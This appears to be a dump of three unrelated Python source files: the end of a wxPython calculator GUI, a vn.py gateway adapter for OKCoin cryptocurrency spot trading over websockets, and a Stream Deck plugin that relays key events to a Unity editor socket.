# BIND FUNCTIONS END
def check_calctext(self):
'''
check calctext
'''
calc_string = str(self.calc_text.GetValue())
self.button['='].Disable()
if self.frame.busy is False:
seq = self.__qc.get_seq(calc_string, self.frame.base)
if seq:
self.button['='].Enable()
def _calc(self):
# disable user input
self.frame.busy = True
self.button['='].Disable()
# exec and draw job status
qc_result = self.__qc.exec_calc(str(self.calc_text.GetValue()),
self.frame.base)
self._draw(qc_result)
# init flag reset
self.frame.init = True
# wait for result of qc
wait_th = threading.Thread(name='wait_th', target=self._wait_anser)
wait_th.start()
def _draw(self, qc_result):
'''
        Called from a worker thread.
        GUI functions must be called on the main thread,
        so use wx.CallAfter to invoke them.
'''
[status, ans] = qc_result
wx.CallAfter(self.frame.SetStatusText, str(status))
if ans is not None and len(ans) > 15:
            wx.CallAfter(self.show_alart, 'Answer', str(ans))
wx.CallAfter(self.calc_text.SetValue, str(ans))
def _wait_anser(self):
while True:
time.sleep(0.5)
wx.CallAfter(self.frame.SetStatusText,
'Phase {0} {1}'
.format(self.__qc.phase[-1][0], self.__qc.phase[-1][1]))
if self.__qc.wait is False:
self._draw(self.__qc.last)
wx.CallAfter(self.button['='].Enable)
self.frame.busy = False
break
|
okcoinGateway.py
|
# encoding: UTF-8
'''
Gateway adapter for vn.okcoin.
Notes:
1. Currently only spot trading in USD and CNY is supported; USD futures contract trading is not yet supported.
'''
import os
import json
from datetime import datetime
from time import sleep
from copy import copy
from threading import Condition
from Queue import Queue
from threading import Thread
from time import sleep
from vnpy.api.okcoin import vnokcoin
from trader.vtGateway import *
from trader.vtFunction import load_json_path
from language.chinese.vt_constant import *
# Price type mapping
priceTypeMap = {}
priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE)
priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE)
priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE)
priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE)
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
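# Example: priceTypeMap['buy_market'] -> (DIRECTION_LONG, PRICETYPE_MARKETPRICE);
# priceTypeMapReverse maps that tuple back to the OKCoin order-type string 'buy_market'.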
# Direction type mapping
directionMap = {}
directionMapReverse = {v: k for k, v in directionMap.items()}
# Order status mapping
statusMap = {}
statusMap[-1] = STATUS_CANCELLED
statusMap[0] = STATUS_NOTTRADED
statusMap[1] = STATUS_PARTTRADED
statusMap[2] = STATUS_ALLTRADED
statusMap[4] = STATUS_UNKNOWN
############################################
# Trading contract symbols
############################################
# USD
BTC_USD_SPOT = 'BTC_USD_SPOT'
BTC_USD_THISWEEK = 'BTC_USD_THISWEEK'
BTC_USD_NEXTWEEK = 'BTC_USD_NEXTWEEK'
BTC_USD_QUARTER = 'BTC_USD_QUARTER'
LTC_USD_SPOT = 'LTC_USD_SPOT'
LTC_USD_THISWEEK = 'LTC_USD_THISWEEK'
LTC_USD_NEXTWEEK = 'LTC_USD_NEXTWEEK'
LTC_USD_QUARTER = 'LTC_USD_QUARTER'
ETH_USD_SPOT = 'ETH_USD_SPOT'
ETH_USD_THISWEEK = 'ETH_USD_THISWEEK'
ETH_USD_NEXTWEEK = 'ETH_USD_NEXTWEEK'
ETH_USD_QUARTER = 'ETH_USD_QUARTER'
# CNY
BTC_CNY_SPOT = 'BTC_CNY_SPOT'
LTC_CNY_SPOT = 'LTC_CNY_SPOT'
ETH_CNY_SPOT = 'ETH_CNY_SPOT'
# Symbol mapping dictionary
spotSymbolMap = {}
spotSymbolMap['ltc_usd'] = LTC_USD_SPOT
spotSymbolMap['btc_usd'] = BTC_USD_SPOT
spotSymbolMap['eth_usd'] = ETH_USD_SPOT
spotSymbolMap['ltc_cny'] = LTC_CNY_SPOT
spotSymbolMap['btc_cny'] = BTC_CNY_SPOT
spotSymbolMap['eth_cny'] = ETH_CNY_SPOT
spotSymbolMapReverse = {v: k for k, v in spotSymbolMap.items()}
############################################
# Mapping between channels and symbols
############################################
channelSymbolMap = {}
# USD
channelSymbolMap['ok_sub_spotusd_btc_ticker'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_ticker'] = LTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_eth_ticker'] = ETH_USD_SPOT
channelSymbolMap['ok_sub_spotusd_btc_depth_20'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_depth_20'] = LTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_eth_depth_20'] = ETH_USD_SPOT
# CNY
channelSymbolMap['ok_sub_spotcny_btc_ticker'] = BTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_ltc_ticker'] = LTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_eth_ticker'] = ETH_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_btc_depth_20'] = BTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_ltc_depth_20'] = LTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_eth_depth_20'] = ETH_CNY_SPOT
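# Example: a push received on channel 'ok_sub_spotcny_btc_ticker' is mapped to the
# contract symbol BTC_CNY_SPOT before the tick is forwarded (see onTicker below).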
########################################################################
class OkcoinGateway(VtGateway):
"""OkCoin接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='OKCOIN'):
"""Constructor"""
super(OkcoinGateway, self).__init__(eventEngine, gatewayName)
self.api = Api(self)
self.leverage = 0
self.connected = False
self.fileName = self.gatewayName + '_connect.json'
self.filePath = load_json_path(self.fileName, __file__)
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
try:
f = file(self.filePath)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
        # Parse the JSON config
setting = json.load(f)
try:
host = str(setting['host'])
apiKey = str(setting['apiKey'])
secretKey = str(setting['secretKey'])
trace = setting['trace']
leverage = setting['leverage']
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
        # Initialize the API
self.leverage = leverage
if host == 'CNY':
host = vnokcoin.OKCOIN_CNY
else:
host = vnokcoin.OKCOIN_USD
self.api.active = True
self.api.connect(host, apiKey, secretKey, trace)
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'接口初始化成功'
self.onLog(log)
        # Start periodic queries
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
pass
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.api.spotSendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.spotCancel(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.api.spotUserInfo()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
pass
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.active = False
self.api.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
            # List of query functions to cycle through
self.qryFunctionList = [self.qryAccount]
            self.qryCount = 0           # countdown until the next query is triggered
            self.qryTrigger = 2         # trigger threshold
            self.qryNextFunction = 0    # index of the next query function to run
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
            # Reset the countdown
self.qryCount = 0
            # Execute the query function
function = self.qryFunctionList[self.qryNextFunction]
function()
            # Advance to the next query function, wrapping back to 0 at the end of the list
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
########################################################################
class Api(vnokcoin.OkCoinApi):
"""OkCoin的API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(Api, self).__init__()
        self.gateway = gateway                  # gateway object
        self.gatewayName = gateway.gatewayName  # gateway name
        self.active = False                     # if True, reconnect automatically after a disconnect
self.cbDict = {}
self.tickDict = {}
self.orderDict = {}
        self.localNo = 0            # local order number
        self.localNoQueue = Queue() # local order numbers still waiting for a system order id
        self.localNoDict = {}       # key: local order no, value: system order id
        self.orderIdDict = {}       # key: system order id, value: local order no
        self.cancelDict = {}        # key: local order no, value: cancel request
self.initCallback()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
data = self.readData(evt)[0]
channel = data['channel']
callback = self.cbDict[channel]
callback(data)
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorMsg = str(evt)
self.gateway.onError(error)
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
# 如果尚未连上,则忽略该次断开提示
if not self.gateway.connected:
return
self.gateway.connected = False
self.writeLog(u'服务器连接断开')
        # Reconnect
if self.active:
def reconnect():
while not self.gateway.connected:
self.writeLog(u'等待10秒后重新连接')
sleep(10)
if not self.gateway.connected:
self.reconnect()
t = Thread(target=reconnect)
t.start()
#----------------------------------------------------------------------
def onOpen(self, ws):
"""连接成功"""
self.gateway.connected = True
self.writeLog(u'服务器连接成功')
        # After connecting, query account and order data
self.spotUserInfo()
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1')
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1')
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_ETH, '-1')
        # After connecting, subscribe to spot trade and account updates
self.subscribeSpotTrades()
self.subscribeSpotUserInfo()
self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC)
self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC)
self.subscribeSpotTicker(vnokcoin.SYMBOL_ETH)
self.subscribeSpotDepth(vnokcoin.SYMBOL_BTC, vnokcoin.DEPTH_20)
self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20)
self.subscribeSpotDepth(vnokcoin.SYMBOL_ETH, vnokcoin.DEPTH_20)
        # If connected to the USD site, also subscribe to futures-related updates
if self.currency == vnokcoin.CURRENCY_USD:
self.subscribeFutureTrades()
self.subscribeFutureUserInfo()
self.subscribeFuturePositions()
        # Push contract information
if self.currency == vnokcoin.CURRENCY_CNY:
l = self.generateCnyContract()
else:
l = self.generateUsdContract()
for contract in l:
contract.gatewayName = self.gatewayName
self.gateway.onContract(contract)
#----------------------------------------------------------------------
def writeLog(self, content):
"""快速记录日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
self.gateway.onLog(log)
#----------------------------------------------------------------------
def initCallback(self):
"""初始化回调函数"""
# USD_SPOT
self.cbDict['ok_sub_spotusd_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_eth_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotusd_ltc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotusd_eth_depth_20'] = self.onDepth
self.cbDict['ok_spotusd_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotusd_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotusd_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotusd_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotusd_trade'] = self.onSpotTrade
self.cbDict['ok_spotusd_cancel_order'] = self.onSpotCancelOrder
# CNY_SPOT
self.cbDict['ok_sub_spotcny_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_eth_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotcny_ltc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotcny_eth_depth_20'] = self.onDepth
self.cbDict['ok_spotcny_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotcny_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotcny_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotcny_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotcny_trade'] = self.onSpotTrade
self.cbDict['ok_spotcny_cancel_order'] = self.onSpotCancelOrder
# USD_FUTURES
#----------------------------------------------------------------------
def onTicker(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
rawData = data['data']
tick.highPrice = float(rawData['high'])
tick.lowPrice = float(rawData['low'])
tick.lastPrice = float(rawData['last'])
tick.volume = float(rawData['vol'])
#tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onDepth(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
rawData = data['data']
tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0]
tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1]
tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2]
tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3]
tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4]
tick.askPrice1, tick.askVolume1 = rawData['asks'][-1]
tick.askPrice2, tick.askVolume2 = rawData['asks'][-2]
tick.askPrice3, tick.askVolume3 = rawData['asks'][-3]
tick.askPrice4, tick.askVolume4 = rawData['asks'][-4]
tick.askPrice5, tick.askVolume5 = rawData['asks'][-5]
tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onSpotUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
info = rawData['info']
funds = rawData['info']['funds']
# Position information
for symbol in ['btc', 'ltc', 'eth', self.currency]:
if symbol in funds['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(funds['freezed'][symbol])
pos.position = pos.frozen + float(funds['free'][symbol])
self.gateway.onPosition(pos)
# Account balance
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = self.gatewayName
account.vtAccountID = account.accountID
account.balance = float(funds['asset']['net'])
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubUserInfo(self, data):
"""现货账户资金推送"""
if 'data' not in data:
return
rawData = data['data']
info = rawData['info']
# Position information
for symbol in ['btc', 'ltc', 'eth', self.currency]:
if symbol in info['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(info['freezed'][symbol])
pos.position = pos.frozen + float(info['free'][symbol])
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def onSpotSubTrades(self, data):
"""成交和委托推送"""
if 'data' not in data:
return
rawData = data['data']
# Local and exchange order numbers
orderId = str(rawData['orderId'])
localNo = self.orderIdDict[orderId]
# Order information
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[rawData['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(rawData['tradeUnitPrice'])
order.totalVolume = float(rawData['tradeAmount'])
order.direction, priceType = priceTypeMap[rawData['tradeType']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = float(rawData['completedTradeAmount'])
order.status = statusMap[rawData['status']]
self.gateway.onOrder(copy(order))
# Trade information
if 'sigTradeAmount' in rawData and float(
rawData['sigTradeAmount']) > 0:
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = spotSymbolMap[rawData['symbol']]
trade.vtSymbol = order.symbol
trade.tradeID = str(rawData['id'])
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = localNo
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.price = float(rawData['sigTradePrice'])
trade.volume = float(rawData['sigTradeAmount'])
trade.direction, priceType = priceTypeMap[rawData['tradeType']]
trade.tradeTime = datetime.now().strftime('%H:%M:%S')
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onSpotOrderInfo(self, data):
"""委托信息查询回调"""
rawData = data['data']
for d in rawData['orders']:
self.localNo += 1
localNo = str(self.localNo)
orderId = str(d['order_id'])
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[d['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = d['price']
order.totalVolume = d['amount']
order.direction, priceType = priceTypeMap[d['type']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = d['deal_amount']
order.status = statusMap[d['status']]
self.gateway.onOrder(copy(order))
#----------------------------------------------------------------------
def generateSpecificContract(self, contract, symbol):
"""生成合约"""
new = copy(contract)
new.symbol = symbol
new.vtSymbol = symbol
new.name = symbol
return new
#----------------------------------------------------------------------
def generateCnyContract(self):
"""生成CNY合约信息"""
contractList = []
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(
self.generateSpecificContract(
contract, BTC_CNY_SPOT))
contractList.append(
self.generateSpecificContract(
contract, LTC_CNY_SPOT))
contractList.append(
self.generateSpecificContract(
contract, ETH_CNY_SPOT))
return contractList
#----------------------------------------------------------------------
def generateUsdContract(self):
"""生成USD合约信息"""
contractList = []
# Spot
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_SPOT))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_SPOT))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_SPOT))
# Futures
contract.productClass = PRODUCT_FUTURES
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_THISWEEK))
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_NEXTWEEK))
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_QUARTER))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_THISWEEK))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_NEXTWEEK))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_QUARTER))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_THISWEEK))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_NEXTWEEK))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_QUARTER))
return contractList
#----------------------------------------------------------------------
def onSpotTrade(self, data):
"""委托回报"""
rawData = data['data']
orderId = rawData['order_id']
# Although the websocket interface returns order IDs asynchronously, testing shows
# that replies come back in the order the requests were sent, so we take the local
# order number queued earlier and map it to the pushed exchange order ID
localNo = self.localNoQueue.get_nowait()
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
# Check whether a cancel request was issued before the exchange order ID was
# returned; if so, perform the cancellation now
if localNo in self.cancelDict:
req = self.cancelDict[localNo]
self.spotCancel(req)
del self.cancelDict[localNo]
#----------------------------------------------------------------------
def onSpotCancelOrder(self, data):
"""撤单回报"""
pass
#----------------------------------------------------------------------
def spotSendOrder(self, req):
"""发单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
type_ = priceTypeMapReverse[(req.direction, req.priceType)]
self.spotTrade(symbol, type_, str(req.price), str(req.volume))
# Increment the local order number, push its string form onto the queue, and return a vtOrderID based on it
self.localNo += 1
self.localNoQueue.put(str(self.localNo))
vtOrderID = '.'.join([self.gatewayName, str(self.localNo)])
return vtOrderID
#----------------------------------------------------------------------
def spotCancel(self, req):
"""撤单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
localNo = req.orderID
if localNo in self.localNoDict:
orderID = self.localNoDict[localNo]
self.spotCancelOrder(symbol, orderID)
else:
# If the client sends a cancel request before the exchange order ID is returned,
# store it in cancelDict and perform the cancellation once the ID arrives
self.cancelDict[localNo] = req
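# Illustrative sketch (not part of the original gateway): spotSendOrder, onSpotTrade
# and spotCancel above keep a FIFO of local order numbers because the exchange
# order ID arrives asynchronously but in send order. A plain-Python model of that
# bookkeeping, using a list as the FIFO and made-up IDs for illustration:
def _example_local_order_mapping():
    pending = []            # local numbers still waiting for an exchange ID
    local_to_exchange = {}  # plays the role of localNoDict
    exchange_to_local = {}  # plays the role of orderIdDict

    def send_order(local_no):
        # spotSendOrder: remember which local number was sent
        pending.append(str(local_no))

    def on_order_reply(exchange_id):
        # onSpotTrade: replies arrive first-sent-first-answered
        local_no = pending.pop(0)
        local_to_exchange[local_no] = exchange_id
        exchange_to_local[exchange_id] = local_no

    send_order(1)
    send_order(2)
    on_order_reply('ex-1001')
    on_order_reply('ex-1002')
    return local_to_exchange, exchange_to_local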
#----------------------------------------------------------------------
def generateDateTime(s):
"""生成时间"""
dt = datetime.fromtimestamp(float(s) / 1e3)
time = dt.strftime("%H:%M:%S.%f")
date = dt.strftime("%Y%m%d")
return date, time
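# Illustrative usage (not part of the original file): OKCoin pushes millisecond
# epoch timestamps, so for example generateDateTime(1420041600000) returns
# ('20150101', '00:00:00.000000') when run in a UTC+8 timezone.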
|
main.py
|
# Setup logging
import logging
# logging.basicConfig(filename="main.log", filemode="w", level=logging.DEBUG)
import sys
import websocket
import json
import unity_socket
from threading import Thread
from event_data import EventData
from actions import InvokeMethodAction, SetFieldPropertyAction, PlayModeAction, PauseModeAction, ExecuteMenu
# Open the web socket to Stream Deck
def open_streamdeck_socket():
global sd_socket
websocket.enableTrace(True) # <- Not sure if needed
# Use 127.0.0.1 because Windows needs 300ms to resolve localhost
host = "ws://127.0.0.1:%s" % SD_PORT
sd_socket = websocket.WebSocketApp(host, on_message=on_message, on_error=on_error, on_close=on_close)
sd_socket.on_open = on_open
sd_socket.run_forever()
def on_message(ws, message):
logging.debug(message)
data = EventData(message)
# Switch function blocks
def will_appear():
# Add the current instance if it is not already in the actions dict
if data.context in actions:
return
# Map action UUIDs to their action classes
mapped_action_classes = {
get_action_name("invoke-method"): InvokeMethodAction,
get_action_name("set-field-property"): SetFieldPropertyAction,
get_action_name("play-mode"): PlayModeAction,
get_action_name("pause-mode"): PauseModeAction,
get_action_name("execute-menu"): ExecuteMenu
}
# If this crashes, mapped_action_classes is probably missing a newly added action class
actions[data.context] = mapped_action_classes[data.action](
data.context,
data.settings,
data.coordinates,
data.state
)
def will_disappear():
# Remove the current instance from the actions dict
if data.context in actions:
actions.pop(data.context)
def did_receive_settings():
# Set settings
if data.context in actions:
actions[data.context].set_settings(data.settings)
def key_down():
# Send onKeyDown event to actions
if data.context in actions:
action = actions[data.context]
action.on_key_down(data.state)
sent = u_socket.send(action.get_action_name(), action.context, action.settings, action.state)
if not sent:
show_alert(data.context)
def key_up():
# Send onKeyUp event to actions
if data.context in actions:
action = actions[data.context]
action.on_key_up(data.state)
# Work around the unavoidable state change that the Elgato software triggers on its own
if action.state_changed:
# setTimeout(function(){ Utils.setState(self.context, self.state); }, 4000);
set_state(action.context, action.state)
def event_default():
pass
# Map events to function blocks
{
"willAppear": will_appear,
"willDisappear": will_disappear,
"didReceiveSettings": did_receive_settings,
"keyDown": key_down,
"keyUp": key_up
}.get(data.event, event_default)()
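# Illustrative sketch (not part of the plugin): on_message above dispatches on the
# incoming event name through a dict of handler functions with a default, rather
# than an if/elif chain. The same pattern in isolation:
def _example_dispatch(event_name):
    def handle_key_down():
        return "keyDown handled"
    def handle_default():
        return "event ignored"
    return {
        "keyDown": handle_key_down
    }.get(event_name, handle_default)()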
def on_error(ws, error):
logging.error(error)
def on_close(ws):
logging.info("### closed ###")
def on_open(ws):
# Register plugin to Stream Deck
def register_plugin():
json_data = {
"event": SD_REGISTER_EVENT,
"uuid": SD_PLUGIN_UUID
}
ws.send(json.dumps(json_data))
Thread(target=register_plugin).start()
# Create the web socket for Unity
def create_unity_socket():
global u_socket
u_socket = unity_socket.UnityWebSocket(UNITY_PORT)
u_socket.on_play_mode_state_changed = lambda data: set_state_all_actions(PlayModeAction,
data.payload["state"])
u_socket.on_pause_mode_state_changed = lambda data: set_state_all_actions(PauseModeAction,
data.payload["state"])
u_socket.on_set_title = lambda data: set_title_by_settings(data.payload["group-id"],
data.payload["id"],
data.payload["title"])
u_socket.on_set_image = lambda data: set_image_by_settings(data.payload["group-id"],
data.payload["id"],
data.payload["image"])
u_socket.on_set_state = lambda data: set_state(data.context,
data.payload["state"])
u_socket.start()
def get_action_name(action_name):
return "%s.%s" % (BASE_PLUGIN_NAME, action_name)
def set_state_all_actions(class_type, state):
context_list = get_actions_context_by_class(class_type)
for context in context_list:
set_state(context, state)
def set_title_by_settings(group_id, member_id, title):
if sd_socket is None:
return
context = get_action_context_by_settings(group_id, member_id)
if context is None:
return
data = {
"event": "setTitle",
"context": context,
"payload": {
"title": title
}
}
logging.info("Changing title from context %s to %s" % (context, title))
sd_socket.send(json.dumps(data))
def set_image_by_settings(group_id, member_id, image):
if sd_socket is None:
return
context = get_action_context_by_settings(group_id, member_id)
if context is None:
return
data = {
"event": "setImage",
"context": context,
"payload": {
"image": image
}
}
logging.info("Changing image from context %s to %s" % (context, image))
sd_socket.send(json.dumps(data))
def get_action_context_by_settings(group_id, member_id):
for key, value in actions.items():
if value.settings.get("id") != member_id:
continue
if value.settings.get("group-id") != group_id:
continue
return key
def get_actions_context_by_class(class_type):
results = []
for key, value in actions.items():
if isinstance(value, class_type):
results.append(key)
return results
# Set the state of a key
def set_state(context, state):
if sd_socket is None:
return
if context not in actions:
return
data = {
"event": "setState",
"context": context,
"payload": {
"state": state
}
}
sd_socket.send(json.dumps(data))
actions[context].set_state(state)
# Show alert icon on the key
def show_alert(context):
if sd_socket is None:
return
data = {
"event": "showAlert",
"context": context
}
sd_socket.send(json.dumps(data))
if __name__ == "__main__":
logging.info("### Start ###")
BASE_PLUGIN_NAME = "com.adamcarballo.unity-integration"
actions = {}
sd_socket = None
u_socket = None
UNITY_PORT = 2245
# Setup the web socket and handle communication
# -port [The port that should be used to create the WebSocket]
SD_PORT = sys.argv[2]
# -pluginUUID [A unique identifier string that should be used to register the plugin once the web socket is opened]
SD_PLUGIN_UUID = sys.argv[4]
# -registerEvent [The event type that should be used to register the plugin once the web socket is opened]
SD_REGISTER_EVENT = sys.argv[6]
# -info [A stringified JSON containing the Stream Deck application information and device information]
SD_INFO = sys.argv[8]
# Create Unity web socket
Thread(target=create_unity_socket, daemon=True).start()
# Open the web socket to Stream Deck
# Thread(target=open_streamdeck_socket, daemon=True).start()
open_streamdeck_socket()
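# Illustrative launch command (values are assumptions, not from this repo): the
# Stream Deck software starts the plugin with interleaved flag/value arguments,
# which is why the reads above use the fixed positions sys.argv[2], [4], [6], [8]:
#   python main.py -port 28196 -pluginUUID <uuid> -registerEvent registerPlugin -info <json>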
|